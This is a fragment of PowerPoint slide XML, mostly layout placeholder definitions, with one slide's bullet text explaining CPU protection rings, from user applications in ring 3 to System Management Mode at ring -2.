              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>Any program code that is running on the system is executed in one of these CPU protection rings:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>- in ring 3 you have user applications that have the least amount of privileges in the system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>- at ring -2 we find the System Management Mode, or SMM, which is the most privileged within the CPU.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="337" name="Shape 337"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2970720" cy="457560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="450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ru-RU" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="338" name="Shape 33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Slide">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="8" name="Shape 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OverTx">
  <p:cSld name="Title, Content over Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="38" name="Shape 38"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Shape 39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="273600"/>
            <a:ext cx="10972440" cy="11448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40" name="Shape 40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1604520"/>
            <a:ext cx="1097244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41" name="Shape 41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="3682080"/>
            <a:ext cx="1097244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fourObj">
  <p:cSld name="Title, 4 Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="42" name="Shape 42"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Shape 43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="273600"/>
            <a:ext cx="10972440" cy="11448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44" name="Shape 44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1604520"/>
            <a:ext cx="535428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45" name="Shape 45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6231960" y="1604520"/>
            <a:ext cx="535428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46" name="Shape 46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6231960" y="3682080"/>
            <a:ext cx="535428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47" name="Shape 47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="3682080"/>
            <a:ext cx="535428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6 Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="48" name="Shape 48"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="Shape 49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="273600"/>
            <a:ext cx="10972440" cy="11448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50" name="Shape 50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1604520"/>
            <a:ext cx="353304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51" name="Shape 51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4319640" y="1604520"/>
            <a:ext cx="353304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52" name="Shape 52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8029800" y="1604520"/>
            <a:ext cx="353304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53" name="Shape 53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8029800" y="3682080"/>
            <a:ext cx="353304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54" name="Shape 54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4319640" y="3682080"/>
            <a:ext cx="353304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55" name="Shape 55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="3682080"/>
            <a:ext cx="353304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Slide">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="60" name="Shape 60"/>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Slide">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="61" name="Shape 61"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="Shape 62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="273600"/>
            <a:ext cx="10972440" cy="11448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63" name="Shape 63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1604520"/>
            <a:ext cx="10972440" cy="397728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Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="64" name="Shape 64"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="Shape 65"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="273600"/>
            <a:ext cx="10972440" cy="11448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66" name="Shape 66"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1604520"/>
            <a:ext cx="10972440" cy="397728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Title, 2 Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="67" name="Shape 67"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="Shape 68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="273600"/>
            <a:ext cx="10972440" cy="11448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69" name="Shape 69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1604520"/>
            <a:ext cx="5354280" cy="397728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70" name="Shape 70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6231960" y="1604520"/>
            <a:ext cx="5354280" cy="397728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71" name="Shape 71"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72" name="Shape 72"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="273600"/>
            <a:ext cx="10972440" cy="11448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Only">
  <p:cSld name="Centered Text">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="73" name="Shape 73"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74" name="Shape 74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="273600"/>
            <a:ext cx="10972440" cy="530784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AndObj">
  <p:cSld name="Title, 2 Content and Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="75" name="Shape 75"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="Shape 76"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="273600"/>
            <a:ext cx="10972440" cy="11448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77" name="Shape 77"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1604520"/>
            <a:ext cx="535428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78" name="Shape 78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="3682080"/>
            <a:ext cx="535428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79" name="Shape 79"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6231960" y="1604520"/>
            <a:ext cx="5354280" cy="397728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Slide">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="9" name="Shape 9"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Shape 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="273600"/>
            <a:ext cx="10972440" cy="11448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11" name="Shape 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1604520"/>
            <a:ext cx="10972440" cy="397728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AndTwoObj">
  <p:cSld name="Title Content and 2 Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="80" name="Shape 80"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="Shape 81"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="273600"/>
            <a:ext cx="10972440" cy="11448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82" name="Shape 82"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1604520"/>
            <a:ext cx="5354280" cy="397728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83" name="Shape 83"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6231960" y="1604520"/>
            <a:ext cx="535428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84" name="Shape 84"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6231960" y="3682080"/>
            <a:ext cx="535428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OverTx">
  <p:cSld name="Title, 2 Content over Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="85" name="Shape 85"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86" name="Shape 86"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="273600"/>
            <a:ext cx="10972440" cy="11448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87" name="Shape 87"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1604520"/>
            <a:ext cx="535428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88" name="Shape 88"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6231960" y="1604520"/>
            <a:ext cx="535428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89" name="Shape 89"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="3682080"/>
            <a:ext cx="1097244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OverTx">
  <p:cSld name="Title, Content over Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="90" name="Shape 90"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91" name="Shape 91"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="273600"/>
            <a:ext cx="10972440" cy="11448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92" name="Shape 92"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1604520"/>
            <a:ext cx="1097244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93" name="Shape 93"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="3682080"/>
            <a:ext cx="1097244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fourObj">
  <p:cSld name="Title, 4 Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="94" name="Shape 94"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95" name="Shape 95"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="273600"/>
            <a:ext cx="10972440" cy="11448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96" name="Shape 96"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1604520"/>
            <a:ext cx="535428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97" name="Shape 97"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6231960" y="1604520"/>
            <a:ext cx="535428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98" name="Shape 98"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6231960" y="3682080"/>
            <a:ext cx="535428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99" name="Shape 99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="3682080"/>
            <a:ext cx="535428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6 Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="100" name="Shape 100"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="Shape 101"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="273600"/>
            <a:ext cx="10972440" cy="11448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102" name="Shape 102"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1604520"/>
            <a:ext cx="353304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103" name="Shape 103"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4319640" y="1604520"/>
            <a:ext cx="353304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104" name="Shape 104"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8029800" y="1604520"/>
            <a:ext cx="353304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105" name="Shape 105"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8029800" y="3682080"/>
            <a:ext cx="353304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106" name="Shape 106"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4319640" y="3682080"/>
            <a:ext cx="353304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107" name="Shape 107"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="3682080"/>
            <a:ext cx="353304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Slide">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="111" name="Shape 111"/>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Slide">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="112" name="Shape 112"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="113" name="Shape 113"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="273600"/>
            <a:ext cx="10972440" cy="11448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114" name="Shape 114"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1604520"/>
            <a:ext cx="10972440" cy="397728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Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="115" name="Shape 115"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="116" name="Shape 116"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="273600"/>
            <a:ext cx="10972440" cy="11448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117" name="Shape 117"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1604520"/>
            <a:ext cx="10972440" cy="397728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Title, 2 Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="118" name="Shape 118"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119" name="Shape 119"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="273600"/>
            <a:ext cx="10972440" cy="11448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120" name="Shape 120"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1604520"/>
            <a:ext cx="5354280" cy="397728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121" name="Shape 121"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6231960" y="1604520"/>
            <a:ext cx="5354280" cy="397728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122" name="Shape 122"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="123" name="Shape 123"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="273600"/>
            <a:ext cx="10972440" cy="11448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Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="12" name="Shape 12"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Shape 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="273600"/>
            <a:ext cx="10972440" cy="11448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14" name="Shape 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1604520"/>
            <a:ext cx="10972440" cy="397728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Only">
  <p:cSld name="Centered Text">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="124" name="Shape 124"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
